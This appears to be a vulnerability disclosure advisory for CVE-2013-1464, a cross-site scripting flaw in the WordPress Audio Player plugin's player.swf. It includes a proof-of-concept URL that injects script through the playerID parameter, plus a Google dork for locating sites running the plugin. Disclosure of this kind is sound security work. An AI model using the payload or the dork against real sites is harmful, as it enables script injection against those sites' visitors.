Lucene search

K

SecurityvulnsSECURITYVULNS:DOC:29034

HistoryFeb 11, 2013 - 12:00 a.m.

[CVE-2013-1464]Wordpress Audio Player Plugin XSS in SWF‏‏

2013-02-1100:00:00

vulners.com

41

Exploit Title: Wordpress Audio Player Plugin XSS in SWF

Release Date: 31/01/13

Author: hip [Insight-Labs]

Contact: [email protected] | Website: http://insight-labs.org

Software Link: http://downloads.wordpress.org/plugin/audio-player.2.0.4.6.zip

Vendor Homepage: http://wpaudioplayer.com/

Tested on: XPsp3

Affected version: 2.0.4.6 before

Google Dork: inurl:/wp-content/plugins/audio-player/

#Ref:CVE-2013-1464

Introduction:

Audio Player is a highly configurable but simple mp3 player for all your audio needs.

XSS - Proof Of Concept:

vulnerable path:
/wp-content/plugins/audio-player/assets/player.swf
vulnerabile parameter:playerID

POC:
/wp-content/plugins/audio-player/assets/player.swf?playerID=a\"))}catch(e){alert(1)}//

Patch:

– Vendor was notified on the 23/01/2013
– Vendor released version 2.0.4.6 on 30/01/2013 Fixed the bug

Related for SECURITYVULNS:DOC:29034

openvas3 nessus2 prion1 cve1 packetstorm1 debian1 wpvulndb1 ubuntucve1 freebsd1 typo32 securityvulns1